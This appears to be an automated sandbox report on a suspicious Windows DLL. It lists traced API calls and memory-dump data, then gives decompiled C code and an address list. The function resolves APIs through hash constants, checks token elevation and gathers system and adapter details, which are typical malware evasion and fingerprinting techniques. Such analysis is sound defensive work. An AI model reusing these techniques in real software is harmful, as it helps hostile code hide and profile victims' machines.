Sleep.KERNEL32(0000000A), ref: 6E7851E4
OutputDebugStringA.KERNEL32(?), ref: 6E785212
OutputDebugStringA.KERNEL32(?), ref: 6E785238
Sleep.KERNEL32(0000000A), ref: 6E785240
OutputDebugStringA.KERNEL32(?), ref: 6E78526E
OutputDebugStringA.KERNEL32(?), ref: 6E785294
Sleep.KERNEL32(0000000A), ref: 6E78529C
OutputDebugStringA.KERNEL32(?), ref: 6E7852CA
OutputDebugStringA.KERNEL32(?), ref: 6E7852F0
Sleep.KERNEL32(0000000A), ref: 6E7852F8
OutputDebugStringA.KERNEL32(?), ref: 6E785326
GetAdaptersInfo.IPHLPAPI(00000000,?,D93F3271,0A1EE59B,00000000,00002800,?,00000007,0000003F,588AB3EA,3B4CAFF7,588AB3EA,1BE15FEB,755AA3F0), ref: 6E7853AA

Strings

@, xrefs: 6E785F8C

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DebugOutputString$Sleep$AdaptersInfo
String ID: @
API String ID: 1241301715-2766056989
Opcode ID: c77ff2cfef0771d0d951b9d19b9dd6d46c696b1c8548fb30f4b588ee6e9b8ee5
Instruction ID: 70d1c796f4657358d66bd210af6bfe2fa2d4d51b234ae6063b9299c4f8545935
Opcode Fuzzy Hash: c77ff2cfef0771d0d951b9d19b9dd6d46c696b1c8548fb30f4b588ee6e9b8ee5
Instruction Fuzzy Hash: 0C81173520438A9FEB305FE0DAA8FDF77EDEF94308F104938AB56561A0EB7045058B62

Uniqueness

Uniqueness Score: -1.00%

Function 6E793930, Relevance: 6.8, APIs: 4, Instructions: 834
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E793930(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v32;
				intOrPtr _v36;
				char _v44;
				void* _v60;
				void* _v72;
				char _v76;
				char _v84;
				void* _v88;
				char _v92;
				void* _v96;
				long _v100;
				long _v104;
				long _v108;
				char _v112;
				void* _v116;
				char _v120;
				void* _v154;
				struct _SYSTEM_INFO _v156;
				signed int _v160;
				void* _v164;
				char _v168;
				void* _v172;
				char _v176;
				char _v180;
				void* _v184;
				char _v188;
				void* _v196;
				intOrPtr _v424;
				signed char _v428;
				signed char _v432;
				char _v496;
				void* _v500;
				void* _v504;
				char _v520;
				void* _v524;
				intOrPtr _t163;
				intOrPtr _t174;
				char _t175;
				intOrPtr* _t183;
				void* _t187;
				void* _t197;
				signed int _t201;
				char _t212;
				intOrPtr _t219;
				intOrPtr _t223;
				void* _t229;
				int _t234;
				intOrPtr _t241;
				void* _t244;
				void* _t247;
				void* _t255;
				void* _t263;
				void* _t264;
				int _t275;
				void* _t279;
				void* _t282;
				void* _t283;
				void* _t286;
				void* _t289;
				void* _t292;
				void* _t295;
				void* _t298;
				void* _t306;
				intOrPtr _t308;
				void* _t311;
				void* _t313;
				void* _t314;
				intOrPtr _t315;
				void* _t316;
				signed char _t322;
				intOrPtr* _t344;
				void** _t346;
				void* _t354;
				void* _t359;
				void* _t360;
				void* _t362;
				void* _t364;
				intOrPtr _t366;
				void* _t367;
				void* _t368;
				void* _t374;
				void* _t375;
				void* _t377;
				signed char _t378;
				void* _t381;
				intOrPtr _t382;
				intOrPtr _t383;
				void* _t384;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				intOrPtr _t392;
				intOrPtr _t394;
				void* _t395;
				intOrPtr _t398;
				intOrPtr _t400;
				intOrPtr* _t402;
				void* _t403;
				void* _t406;
				void* _t407;
				void* _t408;
				void* _t409;
				void* _t410;
				void* _t411;
				intOrPtr* _t413;
				signed char* _t416;
				intOrPtr* _t417;
				void* _t420;
				void* _t425;
				signed int _t429;
				void* _t432;
				void* _t433;
				void* _t434;
				signed int _t439;
				signed int _t442;
				void* _t444;
				intOrPtr* _t445;

				_t439 = _t442;
				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t444 = (_t442 & 0xfffffff0) - 0x1b4;
				_t313 = __ecx;
				_t163 =  *0x6e7bb1f0; // 0xeb0528
				if(_t163 == 0x9ccb2c38) {
					_push(0x30);
					_t163 = E6E791030();
					_t444 = _t444 + 4;
					 *0x6e7bb1f0 = _t163;
				}
				if( *((char*)(_t163 + 0xb)) == 0 || _t313 != 0) {
					_t416 =  &_v432;
					E6E790B70(_t416, 0, 0x11c);
					_t445 = _t444 + 0xc;
					_t377 =  *0x6e7bb1f4; // 0xeb1340
					_v432 = 0x11c;
					if(_t377 == 0xc139578) {
						 *0x6e7bb1f4 = 0;
						_t314 = 0;
						goto L11;
					} else {
						if(_t377 == 0) {
							_t314 = 0;
							goto L11;
						} else {
							_t314 = 0;
							do {
								_t375 = _t314;
								_t311 = _t375;
								while( *((intOrPtr*)(_t311 + _t377 + 8)) != 0x13e99f60) {
									_t375 = _t375 + 1;
									_t311 = _t311 + 0x18;
									if(_t375 < 0x10) {
										continue;
									} else {
										goto L10;
									}
									goto L236;
								}
								_t308 =  *((intOrPtr*)(_t311 + _t377 + 0x14));
								if(_t308 != 0) {
									L14:
									if(_t308 == 0) {
										L16:
										_t417 =  *0x6e7bb1f0; // 0xeb0528
										_t378 = _v432;
										_t322 = _v428;
										 *((intOrPtr*)(_t417 + 4)) = _v424;
										_t428 = (_t378 & 0x000000ff) << 4;
										 *(_t417 + 9) = _t322;
										 *(_t417 + 8) = _t378;
										 *((char*)(_t417 + 0xa)) = _v160 & 0x0000ffff;
										_t380 =  !=  ? 1 : _t314;
										 *((char*)(_t417 + 0xc)) =  !=  ? 1 : _t314;
										_t381 =  *0x6e7bb1f4; // 0xeb1340
										_v32 = _t314;
										 *_t417 = (_t322 & 0x000000ff) + ((_t378 & 0x000000ff) << 4) - 0x50;
										if(_t381 == 0xc139578) {
											 *0x6e7bb1f4 = 0;
											goto L22;
										} else {
											if(_t381 == 0) {
												L22:
												_push(0xa1310f65);
												_t428 = E6E797564(0xa1310f65);
												if(_t428 == 0) {
													if(E6E796C50(0xa1310f65) != 0) {
														_push(0xa1310f65);
														_t428 = E6E797564(0xa1310f65);
													}
												}
												if(_t428 != 0) {
													_t445 = _t445 + 0xfffffff8;
													_t413 = E6E7967C8(_t428, 0x16ea6870);
													goto L25;
												}
											} else {
												do {
													_t374 = _t314;
													_t306 = _t374;
													while( *((intOrPtr*)(_t306 + _t381 + 8)) != 0x16ea6870) {
														_t374 = _t374 + 1;
														_t306 = _t306 + 0x18;
														if(_t374 < 0x10) {
															continue;
														} else {
															goto L21;
														}
														goto L27;
													}
													_t413 =  *((intOrPtr*)(_t306 + _t381 + 0x14));
													if(_t413 != 0) {
														L25:
														if(_t413 != 0) {
															 *_t413(0xffffffff,  &_v44);
														}
														goto L27;
													} else {
														goto L22;
													}
													goto L236;
													L21:
													asm("o16 nop [eax+eax]");
													_t22 = _t381 + 0x180; // 0xeb8e68
													_t381 =  *_t22;
												} while (_t381 != 0);
												goto L22;
											}
										}
										L27:
										_t174 =  *0x6e7bb1f0; // 0xeb0528
										if(_v36 == 0) {
											 *((char*)(_t174 + 0xb)) = 0x20;
										} else {
											 *((char*)(_t174 + 0xb)) = 0x40;
										}
										_t175 = E6E7947B0(_t314, _t417, _t428);
										_t382 =  *0x6e7bb1f0; // 0xeb0528
										 *((char*)(_t382 + 0x28)) = _t175;
										if( *((intOrPtr*)(E6E793930(_t314, 0, _t417, _t428))) >= 0x10) {
											asm("movups xmm0, [0x6e7ba130]");
											asm("movsd xmm1, [0x6e7ba140]");
											asm("movups [esp+0x130], xmm0");
											asm("movsd [esp+0x140], xmm1");
											_t418 =  &_v120;
											_push(0);
											E6E7A9350( &_v120);
											_t429 = _t314;
											do {
												E6E7A9670( &_v120, E6E7A9650( &_v120) + 4);
												_t315 =  *((intOrPtr*)(_t445 + 0x130 + _t429 * 4));
												_t183 = E6E7A9640(_t418, E6E7A9650(_t418) + 0xfffffffc);
												_t429 = 1 + _t429;
												 *_t183 = _t315;
											} while (_t429 < 6);
											_push(0);
											_t314 = 0;
											E6E7AC550(0,  &_v160, _t429, _t439, _t418, 0x80000002);
											E6E7A9510(_t418);
											E6E7AC580( &_v172, _t382,  &_v84, 0x1cd1a4f3);
											_push(_v92);
											_t187 = E6E7AC790( &_v180, _t382);
											_t419 = _t187;
											E6E7A0B10( &_v84);
											if(_t187 != 0) {
												E6E7AC580( &_v168, _t382,  &(_v156.lpMinimumApplicationAddress), 0xc28d248b);
												_push(_v156.dwOemId);
												_t419 = E6E7AC790( &_v176, _t382);
												E6E7A0B10( &(_v156.lpMinimumApplicationAddress));
												E6E7AC580( &_v180, _t382,  &(_v156.dwPageSize), 0xead58213);
												_push(_v160);
												_t432 = E6E7AC790( &_v188, _t382);
												E6E7A0B10( &_v164);
												if(_t419 != 0) {
													if(_t419 == 5) {
														if(_t432 == 0) {
															E6E798CA0( &_v164);
															if(_v168 != 0) {
																_t406 = _v172;
																if(_t406 == 0 || _t406 == 0xffffffff) {
																	_t283 = 1;
																} else {
																	_t283 = 0;
																}
																if(_t283 == 0) {
																	E6E7ABF00(_t406);
																}
															}
															_v172 = 0;
															_t197 = 3;
															goto L64;
														} else {
															if(_t432 == 1) {
																E6E798CA0( &_v164);
																if(_v168 != 0) {
																	_t407 = _v172;
																	if(_t407 == 0 || _t407 == 0xffffffff) {
																		_t286 = 1;
																	} else {
																		_t286 = 0;
																	}
																	if(_t286 == 0) {
																		E6E7ABF00(_t407);
																	}
																}
																_v172 = 0;
																_t197 = 4;
																goto L64;
															} else {
																goto L56;
															}
														}
														goto L236;
													} else {
														if(_t419 != 2 || _t432 != 1) {
															goto L56;
														} else {
															E6E798CA0( &_v164);
															if(_v168 != 0) {
																_t409 = _v172;
																if(_t409 == 0 || _t409 == 0xffffffff) {
																	_t292 = 1;
																} else {
																	_t292 = 0;
																}
																if(_t292 == 0) {
																	E6E7ABF00(_t409);
																}
															}
															_v172 = 0;
															_t197 = 5;
														}
													}
												} else {
													if(_t432 != 0) {
														L56:
														E6E798CA0( &_v164);
														if(_v168 != 0) {
															_t408 = _v172;
															if(_t408 == 0 || _t408 == 0xffffffff) {
																_t289 = 1;
															} else {
																_t289 = _t314;
															}
															if(_t289 == 0) {
																E6E7ABF00(_t408);
															}
														}
														_v172 = 0;
														_t197 = _t314;
													} else {
														E6E798CA0( &_v164);
														if(_v168 != 0) {
															_t410 = _v172;
															if(_t410 == 0 || _t410 == 0xffffffff) {
																_t295 = 1;
															} else {
																_t295 = 0;
															}
															if(_t295 == 0) {
																E6E7ABF00(_t410);
															}
														}
														_v172 = 0;
														_t197 = 2;
													}
												}
											} else {
												E6E798CA0( &_v156);
												if(_v160 != 0) {
													_t411 = _v164;
													if(_t411 == 0 || _t411 == 0xffffffff) {
														_t298 = 1;
													} else {
														_t298 = 0;
													}
													if(_t298 == 0) {
														E6E7ABF00(_t411);
													}
												}
												_v164 = 0;
												_t197 = 1;
											}
										} else {
											_t197 = 1;
										}
										L64:
										_t383 =  *0x6e7bb1f0; // 0xeb0528
										 *(_t445 + 0x1ac) = 0;
										 *(_t383 + 0x24) = _t197;
										_t384 =  *0x6e7bb1f4; // 0xeb1340
										if(_t384 == 0xc139578) {
											 *0x6e7bb1f4 = 0;
											goto L70;
										} else {
											if(_t384 == 0) {
												L70:
												_push(0x3ab94787);
												_t432 = E6E797564(0x3ab94787);
												if(_t432 == 0) {
													if(E6E796C50(0x3ab94787) != 0) {
														_push(0x3ab94787);
														_t432 = E6E797564(0x3ab94787);
													}
												}
												if(_t432 == 0) {
													goto L87;
												} else {
													_t445 = _t445 + 0xfffffff8;
													_t402 = E6E7967C8(_t432, 0xc17c5a6e);
													goto L73;
												}
											} else {
												do {
													_t368 = _t314;
													_t282 = _t368;
													while( *((intOrPtr*)(_t282 + _t384 + 8)) != 0xc17c5a6e) {
														_t368 = _t368 + 1;
														_t282 = _t282 + 0x18;
														if(_t368 < 0x10) {
															continue;
														} else {
															goto L69;
														}
														goto L88;
													}
													_t402 =  *((intOrPtr*)(_t282 + _t384 + 0x14));
													if(_t402 != 0) {
														L73:
														if(_t402 == 0) {
															L87:
															_t201 = _t314;
														} else {
															_push(_t445 + 0x1ac);
															_push(8);
															_push(0xffffffff);
															if( *_t402() == 0) {
																goto L87;
															} else {
																_t403 =  *0x6e7bb1f4; // 0xeb1340
																if(_t403 == 0xc139578) {
																	 *0x6e7bb1f4 = 0;
																	goto L81;
																} else {
																	if(_t403 == 0) {
																		L81:
																		_push(0x3ab94787);
																		_t432 = E6E797564(0x3ab94787);
																		if(_t432 == 0) {
																			if(E6E796C50(0x3ab94787) != 0) {
																				_push(0x3ab94787);
																				_t432 = E6E797564(0x3ab94787);
																			}
																		}
																		if(_t432 == 0) {
																			goto L87;
																		} else {
																			_t445 = _t445 + 0xfffffff8;
																			_t366 = E6E7967C8(_t432, 0x2eeff4c6);
																			goto L84;
																		}
																	} else {
																		do {
																			_t367 = _t314;
																			_t279 = _t367;
																			while( *((intOrPtr*)(_t279 + _t403 + 8)) != 0x2eeff4c6) {
																				_t367 = _t367 + 1;
																				_t279 = _t279 + 0x18;
																				if(_t367 < 0x10) {
																					continue;
																				} else {
																					goto L80;
																				}
																				goto L88;
																			}
																			_t366 =  *((intOrPtr*)(_t279 + _t403 + 0x14));
																			if(_t366 != 0) {
																				L84:
																				if(_t366 == 0) {
																					goto L87;
																				} else {
																					_t275 = GetTokenInformation(_v88, 0x14,  &_v100, 4,  &_v104); // executed
																					if(_t275 == 0) {
																						goto L87;
																					} else {
																						_t201 = _t314 & 0xffffff00 | _v104 > 0x00000000;
																					}
																				}
																			} else {
																				goto L81;
																			}
																			goto L88;
																			L80:
																			asm("o16 nop [eax+eax]");
																			_t66 = _t403 + 0x180; // 0xeb8e68
																			_t403 =  *_t66;
																		} while (_t403 != 0);
																		goto L81;
																	}
																}
															}
														}
													} else {
														goto L70;
													}
													goto L88;
													L69:
													asm("o16 nop [eax+eax]");
													_t62 = _t384 + 0x180; // 0xeb8e68
													_t384 =  *_t62;
												} while (_t384 != 0);
												goto L70;
											}
										}
										L88:
										_t344 =  *0x6e7bb1f0; // 0xeb0528
										 *(_t344 + 0x29) = _t201;
										 *((intOrPtr*)(_t344 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
										if( *_t344 >= 0x10) {
											_t386 =  *0x6e7bb1f4; // 0xeb1340
											 *(_t445 + 0x1a4) = 0;
											if(_t386 == 0xc139578) {
												 *0x6e7bb1f4 = 0;
												goto L100;
											} else {
												if(_t386 == 0) {
													L100:
													_push(0x3ab94787);
													_t432 = E6E797564(0x3ab94787);
													if(_t432 == 0) {
														if(E6E796C50(0x3ab94787) != 0) {
															_push(0x3ab94787);
															_t432 = E6E797564(0x3ab94787);
														}
													}
													if(_t432 != 0) {
														_t445 = _t445 + 0xfffffff8;
														_t386 = E6E7967C8(_t432, 0xc17c5a6e);
														goto L103;
													}
												} else {
													do {
														_t364 = _t314;
														_t263 = _t364;
														while( *((intOrPtr*)(_t263 + _t386 + 8)) != 0xc17c5a6e) {
															_t364 = _t364 + 1;
															_t263 = _t263 + 0x18;
															if(_t364 < 0x10) {
																continue;
															} else {
																goto L99;
															}
															goto L105;
														}
														_t386 =  *(_t263 + _t386 + 0x14);
														if(_t386 != 0) {
															L103:
															if(_t386 != 0) {
																 *_t386(0xffffffff, 8,  &_v76);
															}
														} else {
															goto L100;
														}
														goto L105;
														L99:
														asm("o16 nop [eax+eax]");
														_t84 = _t386 + 0x180; // 0xeb8e68
														_t386 =  *_t84;
													} while (_t386 != 0);
													goto L100;
												}
											}
											L105:
											_t346 =  &_v84;
											 *_t346 =  *(_t445 + 0x1a4);
											_t346[1] = 1;
											if(E6E7ABEA0(_t346, _t386, _t432) == 0) {
												_t387 =  *0x6e7bb1f4; // 0xeb1340
												_v88 = 0;
												if(_t387 == 0xc139578) {
													 *0x6e7bb1f4 = 0;
													goto L114;
												} else {
													if(_t387 == 0) {
														L114:
														_push(0x3ab94787);
														_t432 = E6E797564(0x3ab94787);
														if(_t432 == 0) {
															if(E6E796C50(0x3ab94787) != 0) {
																_push(0x3ab94787);
																_t432 = E6E797564(0x3ab94787);
															}
														}
														if(_t432 != 0) {
															_t445 = _t445 + 0xfffffff8;
															_t398 = E6E7967C8(_t432, 0x2eeff4c6);
															goto L117;
														}
													} else {
														do {
															_t362 = _t314;
															_t255 = _t362;
															while( *((intOrPtr*)(_t255 + _t387 + 8)) != 0x2eeff4c6) {
																_t362 = _t362 + 1;
																_t255 = _t255 + 0x18;
																if(_t362 < 0x10) {
																	continue;
																} else {
																	goto L113;
																}
																goto L119;
															}
															_t398 =  *((intOrPtr*)(_t255 + _t387 + 0x14));
															if(_t398 != 0) {
																L117:
																if(_t398 != 0) {
																	GetTokenInformation(_v96, 0x19, _t314, _t314,  &_v100); // executed
																}
															} else {
																goto L114;
															}
															goto L119;
															L113:
															asm("o16 nop [eax+eax]");
															_t94 = _t387 + 0x180; // 0xeb8e68
															_t387 =  *_t94;
														} while (_t387 != 0);
														goto L114;
													}
												}
												L119:
												_t212 = _v92;
												if(_t212 != 0) {
													_push(_t212);
													E6E7A9350(_t445 + 8);
													_t433 = E6E7A9640(_t445 + 8, 0);
													_t388 =  *0x6e7bb1f4; // 0xeb1340
													if(_t388 == 0xc139578) {
														 *0x6e7bb1f4 = 0;
														goto L160;
													} else {
														if(_t388 == 0) {
															L160:
															_push(0x3ab94787);
															_t420 = E6E797564(0x3ab94787);
															if(_t420 == 0) {
																if(E6E796C50(0x3ab94787) != 0) {
																	_push(0x3ab94787);
																	_t420 = E6E797564(0x3ab94787);
																}
															}
															if(_t420 == 0) {
																goto L178;
															} else {
																_t445 = _t445 + 0xfffffff8;
																_t394 = E6E7967C8(_t420, 0x2eeff4c6);
																goto L163;
															}
														} else {
															do {
																_t360 = _t314;
																_t247 = _t360;
																while( *((intOrPtr*)(_t247 + _t388 + 8)) != 0x2eeff4c6) {
																	_t360 = _t360 + 1;
																	_t247 = _t247 + 0x18;
																	if(_t360 < 0x10) {
																		continue;
																	} else {
																		goto L159;
																	}
																	goto L236;
																}
																_t394 =  *((intOrPtr*)(_t247 + _t388 + 0x14));
																if(_t394 != 0) {
																	L163:
																	if(_t394 == 0) {
																		L178:
																		E6E7A9510( &_v496);
																		if(_v92 != 0) {
																			E6E7ABE30( &_v96, _t433);
																		}
																		goto L122;
																	} else {
																		_t234 = GetTokenInformation(_v104, 0x19, _t433, _v108,  &_v108); // executed
																		if(_t234 == 0) {
																			goto L178;
																		} else {
																			_t395 =  *0x6e7bb1f4; // 0xeb1340
																			if(_t395 == 0xc139578) {
																				 *0x6e7bb1f4 = 0;
																				goto L171;
																			} else {
																				if(_t395 == 0) {
																					L171:
																					_push(0x3ab94787);
																					 *_t445 = E6E797564(0x3ab94787);
																					if( *_t445 == 0) {
																						if(E6E796C50(0x3ab94787) != 0) {
																							_push(0x3ab94787);
																							_v520 = E6E797564(0x3ab94787);
																						}
																					}
																					if( *_t445 == 0) {
																						goto L176;
																					} else {
																						_t445 = _t445 + 0xfffffff8;
																						_t241 = E6E7967C8( *((intOrPtr*)(_t445 + 8)), 0x4e2f8db7);
																						goto L174;
																					}
																				} else {
																					do {
																						_t359 = _t314;
																						_t244 = _t359;
																						while( *((intOrPtr*)(_t244 + _t395 + 8)) != 0x4e2f8db7) {
																							_t359 = _t359 + 1;
																							_t244 = _t244 + 0x18;
																							if(_t359 < 0x10) {
																								continue;
																							} else {
																								goto L170;
																							}
																							goto L236;
																						}
																						_t241 =  *((intOrPtr*)(_t244 + _t395 + 0x14));
																						if(_t241 != 0) {
																							L174:
																							if(_t241 == 0) {
																								L176:
																								E6E7A9510(_t445 + 4);
																								if(_v108 != 0) {
																									E6E7ABE30( &_v112, _t433);
																								}
																								goto L122;
																							} else {
																								_push( *_t433);
																								asm("int3");
																								return _t241;
																							}
																						} else {
																							goto L171;
																						}
																						goto L236;
																						L170:
																						asm("o16 nop [eax+eax]");
																						_t133 = _t395 + 0x180; // 0xeb8e68
																						_t395 =  *_t133;
																					} while (_t395 != 0);
																					goto L171;
																				}
																			}
																		}
																	}
																} else {
																	goto L160;
																}
																goto L236;
																L159:
																asm("o16 nop [eax+eax]");
																_t127 = _t388 + 0x180; // 0xeb8e68
																_t388 =  *_t127;
															} while (_t388 != 0);
															goto L160;
														}
													}
												} else {
													if(_v84 != 0) {
														E6E7ABE30( &_v88, _t432);
													}
													goto L122;
												}
											} else {
												if( *((char*)(_t445 + 0x198)) != 0) {
													E6E7ABE30( &_v84, _t432);
												}
												L122:
												_t434 = _t314;
												_t219 =  *0x6e7bb1f0; // 0xeb0528
												 *(_t219 + 0x2c) = _t434;
												goto L124;
											}
										} else {
											_t264 = E6E795100(_t419, _t432, _t439);
											_t400 =  *0x6e7bb1f0; // 0xeb0528
											if(_t264 == 0) {
												if( *((char*)(_t400 + 0x28)) == 0) {
													 *(_t400 + 0x2c) = 3;
												} else {
													 *(_t400 + 0x2c) = 5;
												}
											} else {
												 *(_t400 + 0x2c) = 6;
											}
											L124:
											_t389 =  *0x6e7bb1f4; // 0xeb1340
											if(_t389 == 0xc139578) {
												 *0x6e7bb1f4 = 0;
												goto L130;
											} else {
												if(_t389 == 0) {
													L130:
													_push(0xa1310f65);
													_t316 = E6E797564(0xa1310f65);
													if(_t316 == 0) {
														if(E6E796C50(0xa1310f65) != 0) {
															_push(0xa1310f65);
															_t316 = E6E797564(0xa1310f65);
														}
													}
													if(_t316 != 0) {
														_t445 = _t445 + 0xfffffff8;
														_t392 = E6E7967C8(_t316, 0x4e85f18d);
														goto L133;
													}
												} else {
													do {
														_t354 = _t314;
														_t229 = _t354;
														while( *((intOrPtr*)(_t229 + _t389 + 8)) != 0x4e85f18d) {
															_t354 = _t354 + 1;
															_t229 = _t229 + 0x18;
															if(_t354 < 0x10) {
																continue;
															} else {
																goto L129;
															}
															goto L135;
														}
														_t392 =  *((intOrPtr*)(_t229 + _t389 + 0x14));
														if(_t392 != 0) {
															L133:
															if(_t392 != 0) {
																GetSystemInfo( &_v156);
															}
														} else {
															goto L130;
														}
														goto L135;
														L129:
														asm("o16 nop [eax+eax]");
														_t103 = _t389 + 0x180; // 0xeb8e68
														_t389 =  *_t103;
													} while (_t389 != 0);
													goto L130;
												}
											}
											L135:
											_t223 =  *0x6e7bb1f0; // 0xeb0528
											 *((short*)(_t223 + 0xe)) = _v156.dwAllocationGranularity;
											 *((intOrPtr*)(_t223 + 0x10)) = _v156.lpMaximumApplicationAddress;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t445 + 0x16c));
											 *((intOrPtr*)(_t223 + 0x18)) = _v156.dwNumberOfProcessors;
											 *((intOrPtr*)(_t223 + 0x1c)) = _v120;
											return _t223;
										}
									} else {
										_push(_t416);
										asm("int3");
										return _t308;
									}
								} else {
									break;
								}
								goto L236;
								L10:
								asm("o16 nop [eax+eax]");
								_t6 = _t377 + 0x180; // 0xeb8e68
								_t377 =  *_t6;
							} while (_t377 != 0);
							L11:
							_push(0xa1310f65);
							_t425 = E6E797564(0xa1310f65);
							if(_t425 == 0) {
								if(E6E796C50(0xa1310f65) != 0) {
									_push(0xa1310f65);
									_t425 = E6E797564(0xa1310f65);
								}
							}
							if(_t425 == 0) {
								goto L16;
							} else {
								_t445 = _t445 + 0xfffffff8;
								_t308 = E6E7967C8(_t425, 0x13e99f60);
								goto L14;
							}
						}
					}
				} else {
					return _t163;
				}
				L236:
			}

0x6e793931
0x6e793936
0x6e793937
0x6e793938
0x6e793939
0x6e79393f
0x6e793941
0x6e79394b
0x6e79478e
0x6e794790
0x6e794795
0x6e794798
0x6e794798
0x6e793955
0x6e79396a
0x6e793976
0x6e79397b
0x6e79397e
0x6e793984
0x6e793992
0x6e79477d
0x6e794787
0x00000000
0x6e793998
0x6e79399a
0x6e7947a2
0x00000000
0x6e7939a0
0x6e7939a0
0x6e7939a2
0x6e7939a2
0x6e7939a4
0x6e7939a6
0x6e7939b4
0x6e7939b5
0x6e7939bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7939bb
0x6e79476c
0x6e794772
0x6e7939f5
0x6e7939f7
0x6e7939fc
0x6e7939fc
0x6e793a06
0x6e793a0a
0x6e793a0e
0x6e793a14
0x6e793a17
0x6e793a2d
0x6e793a32
0x6e793a3a
0x6e793a41
0x6e793a44
0x6e793a4a
0x6e793a51
0x6e793a59
0x6e794739
0x00000000
0x6e793a5f
0x6e793a61
0x6e793a8e
0x6e793a93
0x6e793a99
0x6e793a9d
0x6e794710
0x6e79471b
0x6e794721
0x6e794721
0x6e794710
0x6e793aa5
0x6e793aae
0x6e793ab6
0x00000000
0x6e793ab6
0x6e793a63
0x6e793a63
0x6e793a63
0x6e793a65
0x6e793a67
0x6e793a75
0x6e793a76
0x6e793a7c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e793a7c
0x6e794728
0x6e79472e
0x6e793ab8
0x6e793aba
0x6e793ac6
0x6e793ac6
0x00000000
0x6e794734
0x00000000
0x6e794734
0x00000000
0x6e793a7e
0x6e793a7e
0x6e793a84
0x6e793a84
0x6e793a8a
0x00000000
0x6e793a63
0x6e793a61
0x6e793ac8
0x6e793ac8
0x6e793ad5
0x6e793add
0x6e793ad7
0x6e793ad7
0x6e793ad7
0x6e793ae1
0x6e793ae6
0x6e793aee
0x6e793af9
0x6e793b05
0x6e793b0c
0x6e793b14
0x6e793b1c
0x6e793b25
0x6e793b2e
0x6e793b30
0x6e793b35
0x6e793b37
0x6e793b44
0x6e793b4b
0x6e793b5d
0x6e793b62
0x6e793b63
0x6e793b65
0x6e793b6a
0x6e793b72
0x6e793b7b
0x6e793b82
0x6e793b9b
0x6e793ba0
0x6e793bae
0x6e793bb3
0x6e793bb7
0x6e793bbe
0x6e793c22
0x6e793c27
0x6e793c3a
0x6e793c3e
0x6e793c57
0x6e793c5c
0x6e793c6f
0x6e793c78
0x6e793c7f
0x6e793cd3
0x6e79465c
0x6e79466f
0x6e79467c
0x6e79467e
0x6e794687
0x6e794692
0x6e79468e
0x6e79468e
0x6e79468e
0x6e794699
0x6e79469c
0x6e79469c
0x6e794699
0x6e7946a1
0x6e7946ac
0x00000000
0x6e79465e
0x6e794661
0x6e7946bd
0x6e7946ca
0x6e7946cc
0x6e7946d5
0x6e7946e0
0x6e7946dc
0x6e7946dc
0x6e7946dc
0x6e7946e7
0x6e7946ea
0x6e7946ea
0x6e7946e7
0x6e7946ef
0x6e7946fa
0x00000000
0x6e794663
0x00000000
0x6e794663
0x6e794661
0x00000000
0x6e793cd9
0x6e793cdc
0x00000000
0x6e794108
0x6e79410f
0x6e79411c
0x6e79411e
0x6e794127
0x6e794132
0x6e79412e
0x6e79412e
0x6e79412e
0x6e794139
0x6e79413c
0x6e79413c
0x6e794139
0x6e794141
0x6e79414c
0x6e79414c
0x6e793cdc
0x6e793c81
0x6e793c83
0x6e793ce7
0x6e793cee
0x6e793cfb
0x6e793cfd
0x6e793d06
0x6e793d11
0x6e793d0d
0x6e793d0d
0x6e793d0d
0x6e793d18
0x6e793d1b
0x6e793d1b
0x6e793d18
0x6e793d20
0x6e793d2b
0x6e793c85
0x6e793c8c
0x6e793c99
0x6e793c9b
0x6e793ca4
0x6e793caf
0x6e793cab
0x6e793cab
0x6e793cab
0x6e793cb6
0x6e793cb9
0x6e793cb9
0x6e793cb6
0x6e793cbe
0x6e793cc9
0x6e793cc9
0x6e793c83
0x6e793bc0
0x6e793bc7
0x6e793bd4
0x6e793bd6
0x6e793bdf
0x6e793bea
0x6e793be6
0x6e793be6
0x6e793be6
0x6e793bf1
0x6e793bf4
0x6e793bf4
0x6e793bf1
0x6e793bf9
0x6e793c04
0x6e793c04
0x6e793afb
0x6e793afb
0x6e793afb
0x6e793d2d
0x6e793d2d
0x6e793d33
0x6e793d3e
0x6e793d41
0x6e793d4d
0x6e79464b
0x00000000
0x6e793d53
0x6e793d55
0x6e793d82
0x6e793d87
0x6e793d8d
0x6e793d91
0x6e794622
0x6e79462d
0x6e794633
0x6e794633
0x6e794622
0x6e793d99
0x00000000
0x6e793d9f
0x6e793da6
0x6e793dae
0x00000000
0x6e793dae
0x6e793d57
0x6e793d57
0x6e793d57
0x6e793d59
0x6e793d5b
0x6e793d69
0x6e793d6a
0x6e793d70
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e793d70
0x6e79463a
0x6e794640
0x6e793db0
0x6e793db2
0x6e793e6d
0x6e793e6d
0x6e793db8
0x6e793dbf
0x6e793dc0
0x6e793dc2
0x6e793dc8
0x00000000
0x6e793dce
0x6e793dce
0x6e793dda
0x6e79418b
0x00000000
0x6e793de0
0x6e793de2
0x6e793e0f
0x6e793e14
0x6e793e1a
0x6e793e1e
0x6e794162
0x6e79416d
0x6e794173
0x6e794173
0x6e794162
0x6e793e26
0x00000000
0x6e793e28
0x6e793e2f
0x6e793e37
0x00000000
0x6e793e37
0x6e793de4
0x6e793de4
0x6e793de4
0x6e793de6
0x6e793de8
0x6e793df6
0x6e793df7
0x6e793dfd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e793dfd
0x6e79417a
0x6e794180
0x6e793e39
0x6e793e3b
0x00000000
0x6e793e3d
0x6e793e58
0x6e793e5c
0x00000000
0x6e793e5e
0x6e793e68
0x6e793e68
0x6e793e5c
0x6e794186
